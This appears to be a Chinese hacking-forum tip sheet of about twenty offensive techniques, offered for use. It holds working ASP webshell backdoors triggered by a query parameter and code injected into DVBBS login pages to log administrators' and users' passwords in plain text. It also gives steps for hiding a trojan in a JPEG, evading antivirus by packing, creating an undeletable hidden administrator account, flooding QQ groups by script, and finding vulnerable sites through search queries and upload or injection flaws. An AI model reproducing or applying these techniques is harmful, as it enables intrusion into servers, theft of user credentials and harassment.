1.名称：如何制作图片ASP木马 （可显示图片）

建一个asp文件，内容为

找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索%和％,将其变为00,(不要替换自己asp的),再把jpg文件开头加入

2. 名称：整蛊网吧

先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，复制一个木马过去运行即可。

3．名称：感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"

1和7代表密码最小和最大长度

阿汀我再加个方法：http://md5.rednoize.com/ 在线破解

或者到http://www.md5lookup.com/?category=01-3&searck=on

4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳的时候最好多选择不知名的加壳软件。

5．名称：隐蔽的插入型ASP木马

(1)在我们要做手脚的asp文件里加入如下内容

<%if request("action")="ok" then%>

shell代码插在这里，最好是小马，还要加密一下

<%end if%>

访问的时候在你作手脚的asp文件后面加上?action=ok,即可

(2)另一种方法，在我们要做手脚的asp文件里加入如下内容

<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>

访问的时候在做手脚的asp文件后面加上?filer=XXX

XXX为你本地上传的一个路径如 c:ating123.asp

上传后在做手脚的asp的同文件夹中有ating,asp

（3）前提得到system权限，进入网站目录下一层

mkdir s…

copy ating.asp s…/

这样杀毒软件找不到的

访问http://网站/s…/ating.asp即可。

6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar，此工具在该电脑生成一个超级用户

用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的。

7．名称：QQ群脚本攻击

打开qq对话诓，复制消息，然后，下面的内容保存为.vbs 文件，运行即可。

Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻击脚本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next

8．搜索：程序制作：万鹏 有免费申请空间的，直接上传asp马即可。

9. 名称：全面找出你站上的ASP木马

（1） 用杀毒软件

（2） 用FTP客户端软件，点"工具"->"比较文件夹"

（3） 用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马

（4） 用工具Beyond Compare

10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画

（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样，

老办法:

修改admin_login.asp得到明文DVBBS后台密码

在"username=trim(replace(request("username")这行后面

Dim fsoObject 
Dim tsObject 
Set fsoObject = Server.createObject("Scripting.FileSystemObject") 
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) 
tsObject.Write CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing

只要管理员登陆后台，在目录下就生成了laner.txt。

（2）login.asp中Case "login_chk"下:

on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size 
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing

这样laner.asp将获得全部登陆人的登陆时间，用户名和密码。

（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:

<%if request("n")<>"" and request("p")<>"" then 
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size 
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
end if%>

11. 名称：利用QQ在线状态抓鸽子肉鸡

生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句:

response.write""response.write""

结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里

12. 动画名称：媒体中国整站程序存在多处漏洞

漏洞程序:媒体中国整站程序(第一版)

官方网站:http://meiti.elgod.com/

漏洞: %5c(暴库) 上传 注入

上传页面:down1/upload.asp

13. 名称：免费电话＋MSH命令行工具

http://www.globe7.com/ 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。由于是国际长途，注册一个帐号，送100美分，国内计时0.01/分，你就有100分钟可以白打。是一个帐号哦。

要注意的就是，固定电话，小灵通 形式为0086521123456 521本来时0521，要省略前面的零，手机号也是一样。

14. 名称：Bo-Blog的新漏洞

http://网址/index.php?job=../admin/ban

把其中"禁止搜索的词"那部分

15. 名称：钩魂者入侵传奇私服

用百度 搜索 传奇 inurl:tuku

或者 传奇 inurl:wplm.htm

再或者 传奇 inurl:coolsites.asp

友情链接里插入一句话木马即可

16. 程序: 宏达企业整站上传漏洞

官方主页:http://www.mu126.com/

漏洞页面:/cx/upfile.asp (上传漏洞)

17．无间盗邮箱，在修改密码里，用户名和密码里添or=or

18．名称： bbsxp5.16后台得到webshell

bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传，就是在基本设置上添加上上传类型也不行，并禁止了修改数据备份数据名称，我们可以把此网页保存在本地，改源代码上传。

19．名称：JHACKJ 2005年最新精典教程

下载看看吧，不错，各大网站都有

20．名称：省力入侵韩国肉鸡

在啊D的扫描注入点项，打开这个：http://www.google.co.kr/advanced_search?hl=zh-CN

这是高级搜索项，关键字随便写。这里我写asp?name= 设置为每页显示100条。

语种选择韩文。搜索，很多sa.